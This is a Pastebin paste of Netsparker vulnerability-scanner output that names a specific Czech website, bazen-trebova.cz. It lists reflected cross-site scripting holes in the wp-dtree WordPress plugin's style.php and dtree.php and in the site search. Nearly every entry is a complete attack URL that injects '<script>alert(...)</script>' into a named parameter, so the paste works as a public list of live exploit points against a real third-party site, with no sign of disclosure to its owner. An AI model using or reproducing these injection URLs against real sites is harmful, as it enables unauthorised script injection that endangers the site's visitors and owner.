API tools faq
paste
Advertisement
sroub3k

bazen-trebova.cz

sroub3k
Aug 18th, 2011
249
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 11.61 KB | None | 0 0
raw download clone embed print report
  1. * [Possible] Cross-site Scripting
  2.  
  3. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  4.  
  5. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize='"--></style></script><script>alert(0x000154)</script>&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  6.  
  7. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  8. Parameter Name: fontsize
  9. Parameter Type: Querystring
  10. Attack Pattern: '"--></style></script><script>netsparker(0x000154)</script>
  11. ...
  12. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf='"--></style></script><script>alert(0x000182)</script>&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  13.  
  14. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  15. Parameter Name: fontf
  16. Parameter Type: Querystring
  17. Attack Pattern: '"--></style></script><script>netsparker(0x000182)</script>
  18. ...
  19. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor='"--></style></script><script>alert(0x0001B2)</script>&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  20.  
  21. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  22. Parameter Name: sfontdecor
  23. Parameter Type: Querystring
  24. Attack Pattern: '"--></style></script><script>netsparker(0x0001B2)</script>
  25. ...
  26. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor='"--></style></script><script>alert(0x000208)</script>&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  27.  
  28. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  29. Parameter Name: mfontcolor
  30. Parameter Type: Querystring
  31. Attack Pattern: '"--></style></script><script>netsparker(0x000208)</script>
  32. ...
  33. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor='"--></style></script><script>alert(0x000257)</script>&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  34.  
  35. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  36. Parameter Name: lfontcolor
  37. Parameter Type: Querystring
  38. Attack Pattern: '"--></style></script><script>netsparker(0x000257)</script>
  39. ...
  40. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor='"--></style></script><script>alert(0x000288)</script>&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  41.  
  42. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  43. Parameter Name: lfontdecor
  44. Parameter Type: Querystring
  45. Attack Pattern: '"--></style></script><script>netsparker(0x000288)</script>
  46. ...
  47. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor='"--></style></script><script>alert(0x0002B4)</script>&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  48.  
  49. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  50. Parameter Name: hfontcolor
  51. Parameter Type: Querystring
  52. Attack Pattern: '"--></style></script><script>netsparker(0x0002B4)</script>
  53. ...
  54. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor='"--></style></script><script>alert(0x0002D1)</script>&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  55.  
  56. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  57. Parameter Name: hfontdecor
  58. Parameter Type: Querystring
  59. Attack Pattern: '"--></style></script><script>netsparker(0x0002D1)</script>
  60. ...
  61. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx='"--></style></script><script>alert(0x0002F7)</script>&rssgfxh=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon_h.png
  62.  
  63. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  64. Parameter Name: rssgfx
  65. Parameter Type: Querystring
  66. Attack Pattern: '"--></style></script><script>netsparker(0x0002F7)</script>
  67. ...
  68. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/style.php?fontsize=11&fontf=Verdana, Geneva, Arial, Helvetica, sans-serif&sfontdecor=underline&mfontcolor=000000&lfontcolor=f5b915&lfontdecor=none&hfontcolor=white&hfontdecor=underline&rssgfx=http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree-img/feed-icon.png&rssgfxh='"--></style></script><script>alert(0x000317)</script>
  69.  
  70. Notes: Due to content-type of the response exploitation of this vulnerability might not be possible in all browsers or might not be possible at all. Content-type indicates that there is a possibility of exploitation by changing the attack however Netsparker does not support confirming these issues. You need to manually confirm this problem. Generally lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer.
  71. Parameter Name: rssgfxh
  72. Parameter Type: Querystring
  73. Attack Pattern: '"--></style></script><script>netsparker(0x000317)</script>
  74.  
  75.  
  76. * Cross-site Scripting
  77.  
  78. Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
  79.  
  80. http://www.bazen-trebova.cz/wp-content/plugins/wp-dtree-30/dtree.php?witheff=1&eff=blind&effdur='"--></style></script><script>alert(0x0001AA)</script>
  81. Parameter Name: effdur
  82. Parameter Type: Querystring
  83. Attack Pattern: '"--></style></script><script>alert(0x0001AA)</script>
  84. ...
  85. http://www.bazen-trebova.cz/?s='"--></style></script><script>alert(0x000248)</script>
  86. Parameter Name: s
  87. Parameter Type: Querystring
  88. Attack Pattern: '"--></style></script><script>alert(0x000248)</script>
  89. ...
  90. http://www.bazen-trebova.cz/?"><script>alert(9)</script>
  91. Parameter Name: Query Based
  92. Parameter Type: FullQueryString
  93. Attack Pattern: "><script>alert(9)</script>
  94. ...
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!